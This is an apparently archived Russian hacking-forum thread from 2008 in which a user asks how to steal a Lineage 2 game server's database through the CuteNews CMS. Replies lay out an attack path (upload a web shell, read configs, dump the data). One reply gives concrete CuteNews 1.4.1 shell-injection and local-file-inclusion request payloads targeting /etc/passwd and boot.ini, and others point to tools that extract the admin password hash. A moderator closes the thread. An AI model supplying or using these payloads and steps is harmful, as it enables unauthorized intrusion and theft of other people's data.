Стянуть базу через CuteNews

Discussion in 'Песочница' started by mad_SinneR, 24 Jun 2008.

Thread Status:
Not open for further replies.
  1. mad_SinneR

    mad_SinneR New Member

    Joined:
    15 Apr 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Пипл плс не удаляйте тему, ищу поиском нечё толкового ненаходит :(

    Как можно через CuteNews угнать базу (допустим сервака ла2) помогите плс... Заранее спс!
     
  2. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    Заливаешь шелл, смотришь конфиги -> коннектишся к серверу l2 -> сливаешь данные...
     
    1 person likes this.
  3. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    CuteNews 1.4.1 Shell Injection
    show_archives.php ?template=../inc/ipban.mdu%00&member_db[1]=1&action=add&add_ip=%22%3C?php%20echo%20md5(%22test%22)
    ;%20die;?%3E.%22%20HTTP/1.0\r\n
    Cute News 1.4.1 Local File Inclusion
    show_archives.php?template=../../../../../../../../../../etc/passwd%00
    show_archives.php?template=../../../../../../../../../../boot.ini%00
    Попробуй мож получиться
     
  4. fasty

    fasty Member

    Joined:
    9 May 2008
    Messages:
    0
    Likes Received:
    6
    Reputations:
    -10
    Короче там уязвимость через moy-web и Cute News 1.4.1
    Получаеш доступ к базе...
     
  5. fasty

    fasty Member

    Joined:
    9 May 2008
    Messages:
    0
    Likes Received:
    6
    Reputations:
    -10
    Уязвимость по которой можно получить доступ к главной страничке кто знает что это такое
    админка там в _http://sayt-l2-moyweb/news/
    Эксплойты на узнавание ника и хеша пароля
    _http://www.waraxe.us/tools/
    Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки, позволяющей получить MD5 хэш администратора, с использованием $_COOKIE. Атакующий может получить несанкционированный доступ к конфиденциальной информации на целевой системе.
     
    1 person likes this.
  6. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Хммм...указал я путь до search.php
    А какой ник вводить в эксплойте?

    И когда запускаю эксплойт то он мне пишет:
     
  7. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    А собственно зачем тебе вообще это всё нужно, если ты даже не знаешь что делает эксплойт который ты юзаешь? Помоему оно тебе просто не нужно.

    Он тебе пишет что функция не инициализирована.
    Это наверное потому что ты не поставил бибилиотеку с Курлом - поставь бибилотеку - будет работать.

    P.S. закрыто.
    P.P.S. вообще классная тема, звучит как "плиз, сломайте за меня, а то я ничего не умею делать, но очень хочется".
     
Thread Status:
Not open for further replies.